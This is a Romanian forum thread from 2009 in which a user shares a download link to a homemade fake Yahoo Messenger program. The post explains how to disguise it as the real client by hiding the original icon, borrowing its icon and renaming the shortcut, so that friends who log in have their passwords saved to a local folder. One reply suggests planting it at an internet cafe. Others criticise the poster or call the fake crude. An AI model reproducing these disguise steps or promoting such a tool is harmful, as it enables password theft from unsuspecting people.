mihaim198098 Posted March 27, 2009 Report Posted March 27, 2009 Acesta este un yahoo messenger fake 8 facut de mineInstructiuni:-Luati programul mai intai de http://rapidshare.com/files/210656343/yahoo_mess_fake_8.exe-Acum i facem un shorcut pe desktop(click dreapta pe el>Send To>Desktop (Create shortcut)-Ascundem incoana mess-ului ,,original"-Dam click dreapta pe shortcut-ul fake-ului>Propeties>Change Icon>Mergem in C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe-Dam pe OK si inca odata OK-Acum il redenumim(click dreapta pe el>Rename) cu Yahoo! Messenger-Acum chemati prieteni sa se logheze pe fake si parole se vor salva in C:\ShockSoftHave fun!!
black_death_c4t Posted March 27, 2009 Report Posted March 27, 2009 bro , erai banat , te rog STAI BANAT.PS : Cum ai reusit sa treci de broaste
n3curatu87 Posted March 27, 2009 Report Posted March 27, 2009 doamne vb colegilor cum naiba de ne alegem numai cu de astia care "vor sa sparga paaarole la messeger " nu ca as avea ceva cu ei dar totusi sa ne lase
NangiuVlad Posted March 27, 2009 Report Posted March 27, 2009 1.Nu e deloc veritabil,orice idiot s-ar fi prins ca nu e adevaratul messenger.2.Sunt o multime de variante care sunt ca un messenger normal
luyzette Posted March 28, 2009 Report Posted March 28, 2009 hai ma...ce aveti cu userul asta? mie una mi se pare o idee... cool:), cu toate ca ..chiar daca imi invit prieteni pe la me, nu le fac astfel de farse:P:)
andr3y Posted March 28, 2009 Report Posted March 28, 2009 DA ! nu vei pune prietenii sa se logheze de la tine.. dar merge pus la un internet cafe
NangiuVlad Posted March 28, 2009 Report Posted March 28, 2009 hai ma...ce aveti cu userul asta? mie una mi se pare o idee... cool:), cu toate ca ..chiar daca imi invit prieteni pe la me, nu le fac astfel de farse:P:)Cum a spus si black_death_c4t useru asta era banat,sa stea banat ca doar nu a primit ban degeaba.